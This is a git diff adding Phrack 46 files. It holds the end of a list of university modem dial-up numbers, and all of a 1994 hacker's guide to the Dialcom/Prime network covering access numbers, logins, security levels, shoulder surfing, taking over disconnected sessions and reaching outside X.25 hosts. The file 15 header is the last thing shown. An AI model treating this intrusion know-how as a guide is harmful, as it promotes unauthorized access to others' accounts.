+413-585-3769    SMITH.EDU
+
+413-597-3107    WILLIAMS.EDU
+
+415-333-1077    CALSTATE.EDU
+
+415-338-1200    SFSU.EDU
+        2400
+
+415-380-0000    STANFORD.EDU
+
+416-492-0239    TORONTO.EDU
+
+501-575-3150    UARK.EDU
+        3506
+        7254
+        7266
+        8690
+
+502-588-7027    LOUISVILLE.EDU
+        6020
+        8999
+
+503-245-5511    PCC.EDU
+
+503-346-5975    UOREGON.EDU
+        2150
+        3536
+
+503-370-2500    WILLAMETTE.EDU
+
+503-725-3100    PDX.EDU
+        3144
+        3201
+        5220
+        5401
+
+503-737-1513    ORST.EDU
+        1517
+        1560
+        1569
+
+503-777-7757    REED.EDU
+
+504-286-7300    UNO.EDU
+
+504-334-1024    LSU.EDU
+
+505-277-9990    UNM.EDU
+        5950
+        6390
+
+505-646-4942    NMSU.EDU
+
+508-798-0166    WPI.EDU
+
+509-375-9326    WSU.EDU
+
+510-643-9600    BERKELEY.EDU
+
+510-727-1841    CSUHAYWARD.EDU
+
+512-245-2631    SWT.EDU
+
+512-471-9420    UTEXAS.EDU
+    475-9996
+
+513-327-6188    WITTENBERG.EDU
+
+513-556-7000    UC.EDU
+
+517-336-3200    MSU.EDU
+    351-9640
+
+518-276-2856    RPI.EDU
+        8898
+        8400
+        2857
+        2858
+        8990
+
+518-435-4110    ALBANY.EDU
+        4160
+
+519-725-5100    WATERLOO.EDU
+
+601-325-4060    MSSTATE.EDU
+        2830
+        8348
+
+602-435-3444    MARICOPA.EDU
+
+602-965-7860    ASU.EDU
+
+603-643-6300    DARTMOUTH.EDU
+
+604-753-3245    MALPITA.EDU
+
+606-622-2340    EKU.EDU
+
+606-257-1232    UKY.EDU
+        1353
+        1361
+        1474
+        2836
+        4244
+        5627
+    258-1996
+        2400
+        1200
+    323-1996
+        2400
+        2700
+
+609-258-2630    PRINCETON.EDU
+
+609-896-3959    RIDER.EDU
+
+610-683-3692    KUTZTOWN.EDU
+
+612-626-1920    UMN.EDU
+        2460
+        9600
+
+614-292-3103    OHIO-STATE.EDU
+        3112
+        3124
+        3196
+
+614-593-9124    OHIOU.EDU
+
+615-322-3551    VANDERBILT.EDU
+        3556
+    343-0446
+        1524
+
+615-372-3900    TNTECH.EDU
+
+615-974-3201    UTK.EDU
+        4282
+        6711
+        6741
+        6811
+        8131
+
+616-394-7120    HOPE.EDU
+
+617-258-7111    MIT.EDU
+    257-6222
+
+617-287-4000    UMB.EDU
+    265-8503
+
+617-353-3500    BU.EDU
+        4596
+        9118
+        9415
+        9600
+
+617-373-8660    NEU.EDU
+
+617-437-8668    NORTHEASTERN.EDU
+
+617-495-7111    HARVARD.EDU
+
+617-727-5920    MASS.EDU
+
+619-292-7514    UCSD.EDU
+    436-7148
+    452-4390
+        4398
+        8280
+        8238
+        9367
+    453-9366
+    480-0651
+    534-5890
+        6900
+        6908
+    558-7047
+        7080
+        9097
+
+619-594-7700    SDSU.EDU
+
+619-752-7964    CSUSM.EDU
+
+702-895-3955    UNLV.EDU
+
+703-831-5393    RUNET.EDU
+
+703-993-3536    GMU.EDU
+
+707-664-8093    CALSTATE.EDU
+    822-6205
+
+707-826-4621    HUMBOLDT.EDU
+
+708-467-1500    NWU.EDU
+
+713-749-7700    UH.EDU
+        7741
+        7751
+
+714-364-9496    CALSTATE.EDU
+
+714-773-3111    FULLERTON.EDU
+    526-0334
+
+714-856-8960    UCI.EDU
+
+716-273-2400    ROCHESTER.EDU
+
+716-645-6128    BUFFALO.EDU
+
+719-594-9850    UCCS.EDU
+    535-0044
+
+801-581-5650    UTAH.EDU
+        8105
+    585-4357
+        5550
+
+803-656-1700    CLEMSON.EDU
+
+804-594-7563    CNU.EDU
+
+804-924-0577    VIRGINIA.EDU
+    982-5084
+
+805-549-9721    CALSTATE.EDU
+    643-6386
+
+805-664-0551    CSUBAK.EDU
+
+805-756-7025    CALPOLY.EDU
+
+805-893-8400    UCSB.EDU
+
+806-742-1824    TTU.EDU
+
+808-946-0722    HAWAII.EDU
+    956-2294
+
+810-939-3370    UMICH.EDU
+
+812-855-4211    INDIANA.EDU
+        4212
+        9656
+        9681
+    944-8725
+        9820
+    945-6114
+
+814-269-7950    PITT.EDU
+        7970
+    362-7597
+        7558
+    827-4486
+
+814-863-0459    PSU.EDU
+        4820
+        9600
+    865-2424
+
+816-235-1491    UMKC.EDU
+        1492
+        1493
+        6020
+
+818-701-0478    CSUN.EDU
+
+901-678-2834    MEMST.EDU
+
+904-392-5533    UFL.EDU
+
+904-646-2772    UNF.EDU
+        2735
+
+906-487-1530    MTU.EDU
+
+907-474-0772    ALASKA.EDU
+    789-1314
+
+908-571-3555    MONMOUTH.EDU
+
+908-932-4333    RUTGERS.EDU
+
+909-595-3779    CSUPOMONA.EDU
+
+909-595-5993    CALPOLY.EDU
+    598-7104
+
+909-621-8233    HMC.EDU
+
+909-621-8455    POMONA.EDU
+        8332
+
+909-621-8361    CLAREMONT.EDU
+        8313
+        8108
+        8509
+
+909-880-8833    CSUSB.EDU
+
+913-864-5310    UKANS.EDU
+    897-8650
+        
+916-456-1441    CSUS.EDU
+    737-0955
+
+916-752-7900    UCDAVIS.EDU
+        7920
+        7950
+
+916-894-3033    CSUCHICO.EDU
+
+919-681-4900    DUKE.EDU
+
+919-759-5814    WFU.EDU
+
+919-962-9911    UNC.EDU
+
+-----------------------------------------------------------------------------
+
+Canada
+
+204-275-6100    umanitoba.ca
+        6132
+        6150
+306-586-5550    University of Regina
+306-933-9400    University of Saskatchewan
+403-492-0024    University of Alberta
+        0096
+        3214
+416-978-3959    University of Toronto
+        8171
+418-545-6010    Universite du Quebec a Chicoutimi
+418-656-7700    laval u
+        3131
+        5523
+506-453-4551    University of New Brunswick
+        4560
+        4609
+    452-6393
+514-285-6401    uquebec.ca
+514-340-4449    polymtl.ca
+        4450
+        4951
+    343-2411
+514-398-8111    McGill University
+        8211
+        8711
+514-733-2394    Universite de Montreal
+        1271
+        0832
+514-343-2411
+        7835
+514-848-8800    concordia.ca
+        7494
+        8828
+        4585
+        8834
+        7370
+519-661-3511    University of Western Ontario
+        3512
+        3513
+519-252-1101    Windsor University
+519-725-5100    University of Waterloo
+        1392
+604-291-4700    simon fraser u
+        4721
+        5947
+604-721-2839    univ of victoria
+        6148
+604-822-9600    University of British Columbia
+613-788-3900    Carleton University
+    564-5600
+613-548-8258    Queen's University
+    545-0383
+613-564-3225    University of Ottawa
+        5926
+613-230-1439    York University
+705-741-3350    Trent University
+        3351
+        4637
+709-737-8302    Memorial Univ. of Newfoundland
+807-346-7770    Lakehead University
+819-569-9041    usherb.ca
+    821-8025
+819-822-9723    bishop u
+819-595-2028    Universite du Quebec a Hull
+902-542-1585    acadiau.edu
+902-425-0800    tuns.ca
+    420-7945
+902-429-8270    Saint Mary's University
+902-494-2500    Dalhousie University
+        8000
+902-566-0354    University of Prince Edward Island
+905-570-1889    McMaster University
+        1046
+
+-----------------------------------------------------------------------------
+
+The Rest of the World
+
+31-40-435049    tue.nl
+      455215
+      430032
+34-1-582-1941   Facultad de Odontologia
+   3-333-9954   Barcelona Polytechnic
+         8991   Univ of Barcelona
+     581-2091
+     691-5881   Polytechnic University
+34-7-656-6553   Univ of Zaragosa
+         0108
+         6654
+44-3-34-2755    st-andrews.ac.uk
+44-71-413-0790  birkbeck college
+44-524-843878   lancashire
+44-785-214479   staffs.ac.uk
+49-621-292-1020 uni-mannheim.de
+       121-0251
+49-631-205-2150 uni-kl.de
+           3554
+           3629
+           3630
+49-8421-5665    ku-eichstett.de
+49-8452-70035   tu-muenchen.de
+61-8-223-2657   Univ of Adelaide
+61-9-351-9544   Curtin U
+61-9-381-1630   uwa.edu.au
+         2200
+         3054
+82-2-962        kaist.ac.kr
+886-2-363-9529  NAT TECH U, TAIWAN
diff --git a/phrack46/14.txt b/phrack46/14.txt
new file mode 100644
index 0000000..dc223cb
--- /dev/null
+++ b/phrack46/14.txt
@@ -0,0 +1,665 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 14 of 28
+
+****************************************************************************
+
+              A   L I T T L E   A B O U T   D I A L C O M
+              *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
+
+                                   by
+
+                               Herd Beast
+
+                          (hbeast@phantom.com)
+
+Introduction
+~~~~~~~~~~~
+
+Dialcom is an interesting system for hackers for two reasons:
+First, it is used by business people, reporters and many other world
+wide, and it offers a variety of information services, from a
+bulletin board to stock market updates and news services.  Second,
+Dialcom runs on Prime machines, so using Dialcom is a good way to
+learn Prime.  True, it's not the best, as access is generally restricted,
+but it's better than, say, learning VMS from Information America.
+
+In these days, where everyone seems to be so centered about the
+Internet and the latest Unix holes, it's important to remember that the
+information super-highway is not quite here, and many interesting things
+are out there and not on the Internet.  Phrack has always been a good place
+to find out more about these things and places, and I wrote this article
+after reading the Dialog articles in Phrack.
+
+Well, gentle reader, I guess that my meaning-of-life crap quota is full,
+so let's move on.
+
+Accessing Dialcom and Logging In
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Dialcom is accessible world-wide.  It offers connection to Tymnet, Sprintnet,
+and other networks as well as dialin modems.  Since I am not writing to
+Washington people only, I will specify only the easiest methods -- Tymnet
+and Sprintnet -- and some of the more interesting access methods.
+
+Dialcom is basically a Primecom network.  Each user has an account on
+one or more of the systems connected to that network.  To access Dialcom,
+the user needs to access the machine his account is on.  First, he logs
+into a public data network and follows the steps required to connect to
+a remote note.  On Tymnet, this means getting to the "please log in:"
+prompt, and on Sprintnet it's the famous '@' prompt.
+
+For Tymnet, you must enter at the prompt: DIALCOM;<system number>
+(eg, DIALCOM;57).  The same goes for TYMUSA connection from outside
+the USA.
+
+For Sprintnet or other PADs, you must enter the correct NUA:
+
+   System #         Sprintnet NUA         Tymnet NUA
+   ========         =============        =============
+     XX             3110 301003XX        3106 004551XX
+   (32, 34,
+    41 - 46,
+    50, 52,
+    57, 61,
+    63, 64)
+
+It should be noted that Dialcom keeps its own X.25 network, Dialnet,
+and the NUAs on it are those of the systems (connect to address "57"
+for system 57).
+
+Dialcom has other access methods, meant to be used from outside the
+USA, but sometimes available from within as well.
+
+One is a COMCO card, which is inserted into a reader connected to the
+computer and the modem through a serial link.  The user then calls a
+special dial-up number, and can connect to Dialcom (or any other NUA).
+The card contains a number of "tax units" which are deducted as the
+connection goes through, until they are exhausted and the card is useless.
+The user calls the dial-up and types in ".<CR>".  The amount of tax units
+on the card will then appear on the screen, and the user can connect to a
+host.  COMCO dial-ups:
+
+                Location                                Number
+          =======================                   ==============
+          Australia                                 +61-02-2813511
+          Belgium                                   +32-02-5141710
+          France                                    +33-1-40264075
+          West Germany                              +49-069-290255
+          Hong Kong                                 +852-5-8611655
+          Netherlands                               +31-020-6624661
+          Switzerland                               +41-022-865507
+          United Kingdom                            +45-01-4077077
+          USA (Toll Free)                           +1-800-777-4445
+          USA                                       +1-212-747-9051
+
+The other way is through Infonet.  I will not turn this into an Infonet
+guide, save to write the logon sequence needed to access Dialcom.
+At the '#' prompt, enter 'C'.  At the "Center:" prompt, enter "DC".
+Dialcom NUAs are 31370093060XX, where XX is the system number.
+
+Once the connection to a Dialcom system has been established, you will
+be greeted by the Prime header:
+
+Primecom Network 19.4Q.111 System 666
+
+ Please Sign On
+>
+
+And the '>' prompt.  This is a limited prompt as most commands cannot
+be issued at it, so you need to login.
+
+Dialcom user id's are typically 3 alphabetic characters followed by
+several digits.  The password may contain any character except for
+",;/*" or spaces, and my experience shows that they tend to be of
+intermediate complexity (most will not be found in a dictionary, but
+could be cracked).
+
+Password security may become useless at this point, because the Dialcom
+Prime systems allow ID to take both user id and password as arguments
+(which some other Primes do not) and in fact, Dialcom tutorials tell
+users to log on like this --
+
+>ID HBT007 IMEL8
+
+-- which makes ``shoulder surfing'' easier.
+
+One you log on, you will see:
+
+Dialcom Computer Services 19.4Q.111(666)
+On At 14:44 07/32/94 EDT
+Last On At 4:09 06/44/94 EDT
+
+>
+
+And again, the '>' prompt.
+
+>off
+Off At 14:45 07/32/94 EDT
+Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.
+
+Security at Dialcom
+~~~~~~~~~~~~~~~~~~
+
+As mentioned, while passwords are relatively secure, the manner in
+which they are entered is usually not.
+
+As for the accounts themselves, it's important to understand the
+general way accounts exist on Dialcom.  Dialcom users are usually
+part of a business that has an ``account group'' on Dialcom.  Each
+user gets an account from that group (HBT027, HBT054).  Each group
+also has a group administrator, who controls what each account can
+access.  The administrator determines which programs (provided by Dialcom)
+each user can access.  A foreign correspondent for a magazine might
+have access to the news services while other users might not.  The
+administrator also determines how much the user can interface with
+the Prime OS itself.  Each user can run a few basic commands (list
+files, delete, sign off) but above that, it's up to the administrator.
+The administrator may opt to remove a user from the controlling menuing
+system -- in which case, the user has no restrictions forced upon him.
+
+Group administrators, however, handle only their groups, and not the
+Dialcom system.  They need, for example, to notify Dialcom staff if
+they want an account removed from the system.
+
+Another (different yet combined) part of the account/group security
+are accounts' ``security levels'' (seclevs).  Seclevs range from 3
+to 7, and determine the access an account has to various places.
+Seclev 4 users, for example, are not restricted to seeing only users
+of their group on the system, and can delete accounts from the menuing
+system.
+
+User accounts own their directories and files within (but high seclevs
+can read other users' files).  Each account's security is left in some
+extent to its owner, in that the user sets his own password.  When
+setting a password, a user can set a secondary password.  Any user wishing
+to access that user's directory will need that password.  Furthermore,
+the user can allow other users to attach as owners to his directory if
+they know his password (come to think of it, couldn't they just login
+as him?).  This is all controlled by the PASSWD program (see ``Common
+Commands'', below).
+
+Dialcom also allows for login attempt security using the NET_LOCK
+program.  NET_LOCK blocks login attempts from addresses that have
+registered too many login failures over a period of time (the default
+being blocking for 10 minutes of addresses that have registered more
+than 10 failed login within 5 minutes).  NET_LOCK -DISPLAY is accessible
+to users of Seclev 5 and shows addresses currently blocked and general
+information.  Other options are accessible to Seclev 7 and are:
+-ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block
+an address), -LOCK_PERIOD (the period in which these attempts must
+occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the
+lockout feature is disabled).
+
+A little unrelated is the network reconnect feature of the Prime
+computers.  When a user gets disconnected from the system because
+of a network failure, or for any other reason which is not the
+system's fault, he can log back in and reconnect into the disconnected
+job.  When this happens, the user sees, upon logging on:
+
+
+You Have a Disconnected Job:
+
+  HBT007               d09   1  109   NT   NETLINK  989898989    6 3
+
+Do You Want to Reconnect?
+
+Which means user's HBT007 job #9 (a NETLINK command) is waiting for
+a reconnection.  At this point, the user can continue, leaving the
+job to hang until the system signs it off when a certain amount of
+time expires; sign the job off himself; or reconnect to that job.
+(Try "HELP" at the prompt.)  This wouldn't be important, but experience
+shows that many disconnections occur when someone logs into Dialcom
+over a network, and then uses NETLINK (or another program) to connect
+to another site over a network, and somewhere, some time, he issues
+a control sequence (let's say to tell NETLINK to do something) that
+gets processed by the first network, which logs him off.  So there
+is potential to log into the middle of people's sessions (yeah, like
+detached ttys).
+
+Common Commands
+~~~~~~~~~~~~~~
+
+Common commands are in reality the basic Prime commands that every
+account has access to.  Here they are, in alphabetical order.
+
+`CLEAR' Clear the screen.
+
+`DATE'  Shows the date at which a command was entered.  Output:
+
+        >DATE
+        Proceed to next command
+
+        >BAH
+
+        Friday, June 38, 1994 10:01:00 AM EDT
+
+`DEL'   Deletes a file.
+
+`DELP'  Deletes several files based on wildcards.  Can verify deletion
+        of every file, and delete only file modified before, after, or
+        between certain dates.
+
+`ED'    Is the default and simplest file editor on Dialcom (some of its
+        brothers are JED and FED).  Once invoked, ED enters INPUT mode,
+        in which the user just types text.  To enter EDIT mode, where
+        you can issue commands, you need to press <CR> on a blank line
+        (the same thing will get you from EDIT mode back to INPUT mode).
+        The EDIT mode uses a pointer to a line.  All commands are carried
+        on the line that the pointer points to.  "T" will bring the
+        pointer to the top of the text, "B" to the bottom, "N" to the
+        next line down, "U" to the next line up, and "L <word>" to
+        the line containing <word>.  ED commands include:
+
+        P:     PRINT the pointer line.  P<number> will print <number>
+               of lines.
+        C:     Change words.  The format is "C/old word/new word".
+        A:     Appends words.  The format is "A <words>".
+        R:     Retype pointer line.  The format is "R <new line>".
+        SP:    Check the spelling of the text, and then point to
+               the top of the text.
+        SAVE:  Will save the text and exit ED.
+        Q:     Will quit/abort editing and exit ED.
+
+`F'     List all file info.  Output:
+
+        DIALCOM.TXT  001  13/30/94  13:50  ASC  D W R
+
+        Which means file name "DIALCOM.TXT", size of 1 file blocks,
+        lat modified on 13/30/94 at 13:50, is an ASC type file, and
+        the account has the permissions to D(elete), W(rite), and
+        R(ead) it.
+
+`HELP' (`?')  Displays a nicely formatted menu of available commands.
+
+`INFO'  System info.  INFO <info-file-name> displays an information
+        file, for example, INFO NETLINK.
+
+        "INFO ?" lists info files.
+        "INFO BRIEF" lists info files grouped by application
+        "INFO INFO" lists info files with their descriptions.
+
+`L'     List all file names.  Output:
+
+        <S666-6>HBT007 (Owner)
+
+        DIALCOM.TXT
+
+`LS'    Display information about available segments and the account's
+        access to them.  Output:
+
+        2 Private static segments.
+        segment access
+        --------------
+        4000    RWX
+        4001    RWX
+
+        11 Private dynamic segments.
+        segment access
+        --------------
+        4365    RX
+        4366    RX
+        4367    RWX
+        4370    RWX
+        4371    RX
+        4372    RWX
+        4373    RX
+        4374    RWX
+        4375    RX
+        4376    RX
+        4377    RWX
+
+`NAME'  Changes UFD name.  Output:
+
+        >NAME
+
+        Old Name: John Gacy
+        UFD Name: Herd Beast
+        All done
+
+        >WHO
+
+        Herd Beast <S666-6>HBT007
+
+`NETWORK'  Accesses a database that contains dial-up number for Sprintnet,
+           Tymnet, Datapac and Dialcom's Dialnet by State/City.
+
+`OFF'   Sign off the system.
+
+`ONLINE' Who's online?  The amount of data displayed depends on the
+         account's seclev.  Seclevs below 4 are restricted to seeing
+         only users of their group.  Output:
+
+         HBT007      PRK017      MJR
+
+`PAD'   Allows you to send commands to an X.29 PAD, these commands
+        being the SET/SET?/PAR? commands and their parameter/value
+        pairs.
+
+`PASSWD' Change your password.  PASSWD has two forms: a short one,
+         which just changes the user's password, and a long form,
+         invoked by PASSWD -LONG, which allows the user to set
+         a second password for other users accessing his directory,
+         and also to determine if they can have owner access to
+         the directory.
+
+`PROTECT'  Protects a file (removes permissions from it).
+
+           "PROTECT DIALCOM.TXT" will remove all three (D, W, R)
+           attributes from it.  This will result in:
+
+           >DEL DIALCOM.TXT
+           Insufficient access rights.  DIALCOM.TXT (DEL:10)
+
+           But --
+
+           >DELETE DIALCOM.TXT
+           "DIALCOM.TXT" protected, ok to force delete? y
+
+`SECLEV' Your security level.  Output:
+
+         Seclev=5
+
+`SIZE'  Size information about a file.  Output:
+
+        1 Block, 404 Words
+
+`STORAGE'  Shows storage information.
+
+`SY'    Show users on system.  (Same restrictions as for ONLINE apply.)
+        Will show user name, time on, idle time, devices used, current
+        jobs and state, etc.  Output:
+
+    41 Users on sys 666
+
+ Names    use idle mem State command    object    devs
+
+ HBT007   *11   0  155   R1   SY                   6 3  from Tymnet via X.25
+
+
+`SYS'   Displays account information and system number.  Output:
+
+        <S666-6>HBT007  on system 666.
+
+`TERM'  Used to tell the Dialcom computer what terminal the user is
+        using.  A list of supported terminals is generated by "TERM
+        TERMINALS".  TERM options are:
+
+        TYPE <terminal type>         (TYPE VT100)
+        WIDTH <width>                (Terminal width, if different
+                                      than default)
+        TOP                          (Start listings at top of screen)
+        PAUSE                        (Pause listings when screen is
+                                      full)
+
+        -ERASE, -KILL <char>         (Sets the erase or kill character)
+        -BREAK <ON|OFF>              (Enables or disables BREAKs)
+        -HALF or -FULL               (Half duplex of full duplex)
+        -DISPLAY                     (Output current terminal information)
+
+`WHO'   Displays account information.  Output:
+
+        <S666-6>HBT007
+
+        Which means user HBT007 on system 666 on device 6.
+
+Communicating on Dialcom
+~~~~~~~~~~~~~~~~~~~~~~~
+
+Users who want to communicate on Dialcom have two choices, basically.
+These are the Dialcom bulletin board and electronic mail.  The Dialcom
+bulletin board has two versions.  The first consists of several message
+bases (called ``categories'') which are shared between some Dialcom
+systems (and mostly used by bored employees, it seems); there are also
+private bulletin boards, which are not shared between the systems.  They
+belong to account groups, and only users in an account group can access
+that group's bulletin board system.  These version of the Dialcom board
+are often empty (they have no categories defined and hence are unusable).
+
+This is accessed by the command POST (PRPOST for the private board).
+Once POST is activated, it will display a prompt:
+
+Send, Read or Purge:
+
+If the answer is READ, POST will ask for a category (a list of categories
+will be displayed if you type HELP at that prompt).  Once a category
+has been joined, you will be able to read through the messages there:
+
+Subject:  ?
+From:  HBT007             Posted:  Sat  32-July-94  16:47    Sys 666
+
+quit
+/q
+/quit
+
+Continue to Next Item?
+
+Answering SEND at the first prompt will allow you to send a message in a
+category.
+
+Answering PURGE will allow you to delete messages post by your account.
+When you enter PURGE and the category to purge message from, the system
+will show you any posts that you are allowed to purge, followed by a
+"Disposition:" prompt.  Enter DELETE to delete the message.
+
+The second way to communicate is the Dialcom MAIL system.  MAIL allows
+sending and receiving messages, it allows for mailing lists, filing
+mail into categories, holding mail to read later and so on.  MAIL is
+invoked by entering, uh... oh, yes, MAIL.
+
+It works along similar lines to those of POST, and will display the following
+prompt:
+
+Send, Read or Scan:
+
+SEND:  Allows you to send a message.  It will prompt with "To:",
+"Subject:" and "Text:" (where you enter the actual message, followed
+by ".SEND" on a blank line to end).  After a message is sent, the
+"To:" prompt will appear again -- use "QUIT" to leave it.
+
+A word about the "To:" prompt.  There are two configuration files which
+make its use easier.  First the MAIL.REF file, which is really a mailing
+list file.  It contains entries in the format of --
+
+        <Nick> <Accounts>
+        DOODZ DVR014 ABC0013 XYZ053
+
+-- and at the "To:" prompt, you can just enter "DOODZ" and the message
+will be sent to all three accounts.  When you enter a name, MAIL searches
+through your MAIL.REF, and then through the account administrator's, and
+only then parses it as an account name.  Second is the mail directory,
+which contains the names and account IDs of many users the account is
+in contact with.  To display it, type "DIS DIR" at the first prompt.
+You'll get something like this:
+
+HERD-BEAST            6666:HBT007      WE'RE BAD AND WE'RE KRAD
+
+Which means you can type "HERD-BEAST" at the prompt, and not just
+HBT007.  Also, there are special options for the "To:" prompt, most
+notable are: CC to send a carbon copy; EX to send the message with
+``express priority''; DAR to request that if the message is sent
+to a user on another Dialcom system, POSTMASTER will send you a
+message verifying that your message has been sent; and NOSHOW,
+to keep the receiver from seeing everybody else on the "To:" list.
+For example (all these people are in the mail directory),
+
+        To: DUNKIN D.DREW CC FOLEY NOSHOW EX
+
+You enter the message about to be sent at the "Text:" prompt.  That
+mode accepts several commands (like .SEND), all of which begin with a
+dot.  Any command available at the "To:" prompt is available here.
+For example, you can add or remove names from to "To:" field using
+".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>".
+You also have a display command, ".DIS".  ".DIS" alone shows the text
+entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows
+the entire header; etc.  Finally, you have editing option.  ".ED" will
+load editing mode, so you can change the text you entered.  ".LOAD
+<filename>" will load <filename> into the text of the message.  ".SP"
+will check the spelling of text in the message, and there are other
+commands.
+
+READ:  Allows you to read mail in your mailbox.  Once you enter READ,
+MAIL will display the header of the first message in your mailbox
+(or "No mail at this time") followed by a "--More--" prompt.  To
+read the message, press <CR>; otherwise, enter NO.  After you are done
+reading a message, you will be prompted with the "Disposition:" prompt,
+where you must determine what to do with the message.  There you can enter
+several commands:  AGAIN to read the message again;  AG HE to read the
+header again; AP REPLY to reply to the message and append the original
+message to the reply; AP FO to forward the message to someone and add
+your comments to it; REPLY to reply to the sender of the message; REPLY
+ALL to reply to everybody on the "To:" field; FILE to file the message;
+SA to save the message into a text file; NEXT to read the next message
+in your mailbox; and D to delete the message.
+
+SCAN:  Allows you see a summary of the messages in the mailbox.  Both
+READ and SCAN have options that allow you to filter the messages you
+want to read:  FR <ids> to get only messages from <ids>; TO <ids> to
+get only messages sent to <ids>; 'string' to get only messages containing
+``string'' in the "Subject:" field; "string" to get only messages
+containing ``string'' in the message itself; FILE CATEGORY to get only
+messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages
+in that date (adding a '-' before or after the date will get you everything
+before or after that date, and it's also possible to specify two dates
+separated by a '-' to get everything between those dates.  For example,
+to get all of Al Gore's messages about Clipper before August 13th:
+
+        READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94
+
+There is also a QS (QuickScan) command that behaves the same as SCAN,
+only SCAN shows the entire header, and QS just shows the "From:" field.
+
+However, there is more to do here than just send, read or scan.
+Some of it was mentioned when explaining these commands.  Both sent
+and received messages can be saved into a plain text file or into
+a special mailbox file, called MAIL.FILE.  Messages filed into the
+MAIL.FILE can be grouped into categories in that file.
+
+SAVING MESSAGES:  Messages are saved by entering "SA filename" at a
+prompt.  For sent message, it's the "Text:" prompt, while entering the
+message, and the command is ".SA", not "SA".  For received message, it's
+either the "--More--" or the "Disposition:" prompt.
+
+FILING MESSAGES:  Messages are filed in two cases.  First, the user
+can file any message into any directory, and second, the system files
+read messages that lay in the mailbox for over 30 days.  Received messages
+are filed by entering "FILE" at the "Disposition:" prompt.  This files
+the message into a miscellaneous category called BOX.  If an optional
+<category-name> is added after "FILE", the message will be filed into
+that category.  If <category-name> doesn't exist, MAIL can create it
+for you.  After a message has been filed, it's not removed from the
+mailbox -- that's up to the user to do.  Sent messages behaved the same
+way, but the command is ".FILE" from the "Text:" prompt.
+
+To display categories of filed mail, enter DIS FILES at a prompt.  To
+read or scan messages in filed, just add "FILE <category-name> after
+the command (READ, SCAN, etc).  To delete a category, enter D FILE
+<category-name>.  To delete a single message in a category, just use
+D as you would on any other message, after you read it from the
+MAIL.FILE.
+
+Connecting via Dialcom
+~~~~~~~~~~~~~~~~~~~~~
+
+Dialcom allows its customers to access other systems through it.
+There are some services offered specifically through Dialcom, such as
+the BRS/MENUS service, which is an electronic library with databases
+about many subjects, Telebase's Cyclopean Gateway Service, which offers
+access to many online database services (like Newsnet, Dialog and even BRS)
+and more.  These services have a direct connection to Dialcom and software
+that maps Dialcom user ids to their own ids (it's not usually possible for
+someone to access one of these services without first connecting to Dialcom).
+
+Another method is general connection to X.25 addresses.  Since Dialcom
+is connected to X.25, and it allows users to use the Prime NETLINK
+commands, it's possible to PAD out of Dialcom!!#!
+
+NETLINK is invoked by entering NETLINK.  NETLINK then displays its own,
+'@' prompt.  The commands available there are QUIT, to quit back to
+the OS; CONTINUE, to return to an open connection; CALL, to call an
+address; and D, to disconnect an open connection.
+
+CALL takes addresses in several formats.  A system name, to connect to
+a Dialcom system, or an address in the format of DNIC:NUA.  For example,
+
+@ CALL :666
+Circuit #1
+666 Connected
+[...]
+
+@ CALL 3110:21300023
+Circuit #2
+21300023 Connected
+[...]
+
+NETLINK establishes connections in the form of circuits.  A circuit can
+be broken out of into command mode (the '@' prompt), using "<CR>@<CR>",
+and another can be opened, or parameters can be changed, etc.
+NETLINK has other commands, to log connections into a file, or set PAD
+parameters (SET, PAR), or turn on connection debugging, or change
+the default '@' prompt, and more.
+
+Things to Do on Dialcom
+~~~~~~~~~~~~~~~~~~~~~~
+
+Much of what Dialcom offers was not covered until now and will not
+be covered.  That's because most the services could use a file each,
+and because many account groups have things enabled or disabled
+just for them.  Instead, I will write shortly about two of the more
+interesting things online, the news service and clipping service,
+and add pointers to some interesting commands to try out.
+
+The news service, accessed with the NEWS command, is a database of
+newswires from AP, Business Wire, UPI, Reuters and PR Newswire.
+The user enters the database, and can search for news by keywords.
+
+After entering NEWS, you will see a menu of all the news agencies.
+Once you choose an agency, you will enter its menu, which sometimes
+contains a copyright warning and terms of usage and also the list
+of news categories available from that agency (National, North America,
+Business, Sports, etc).  Once you choose the category, you will be
+asked for the keyword to search for.  If a story (or several stories) was
+found containing your desired keyword, you can read through the
+stories in the order of time, or the order they appear, or reverse
+order and so on, and finally mail a story to yourself, or enter new
+search keywords, or jump to another story, or simply quit.
+
+The news clipping service, available with the command NEWSTAB, allows
+the user to define keyword-based rules for selecting news clippings.
+The system then checks every newswire that passes through it, and if
+it matches the rules, mails the newswire to the user.
+
+After entering NEWSTAB, you are presented with a menu that allows you
+to show, add, delete, and alter your rules for choosing news.  The rules
+are made using words or phrases, logical operators, wildcards and
+minimal punctuation.  A rule can be as simple as "HACKING", which will
+get every newswire with the word "hacking" in it mailed to you, or
+if you want to be more selective, "NASA HACKING".  Logical operators
+are either AND or OR.  For example, "HACKING AND INTERNET".  Wildcards
+are either '*' or '?' (both function as the same).  They simple replace
+any number of letters.  Punctuation is permitted for initials,
+abbreviations, apostrophes or hyphens, but not for question marks and
+similar.  All of this is explained in the NEWSTAB service itself.
+
+For the file hungry, Dialcom offers several file transfer programs,
+including KERMIT and Dialcom's FT, which implements most popular
+protocols, like Zmodem, Xmodem, etc.
+
+A small number of other fun things to try:
+
+NET-TALK        The ``interactive computer conferencing system'' -- build
+                your private IRC!
+
+CRYPTO          Dialcom's encryption program.  Something they're probably
+                going to love on sci.crypt.
+
+NUSAGE          By far one of the better things to do on Dialcom, it was
+                left out of this file because it is simply huge.  This
+                program allows the user (typically an administrator) to
+                monitor network usage, sort the data, store it, peek
+                into all the little details (virtual connection types,
+                remote/local addresses, actions, time, commands, etc).
+                Unfortunately, it's completely beyond the scope of this
+                file, as there are tons of switches and options to use
+                in order to put this program to effective use.
+ 
diff --git a/phrack46/15.txt b/phrack46/15.txt
new file mode 100644
index 0000000..4331225
--- /dev/null
+++ b/phrack46/15.txt
@@ -0,0 +1,1030 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 15 of 28
+
+****************************************************************************
+
+                            visanetoperations; part1
+
+                              obtainedandcompiled
+
+                                       by
+
+                                     icejey
+                                       /\
+   lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist
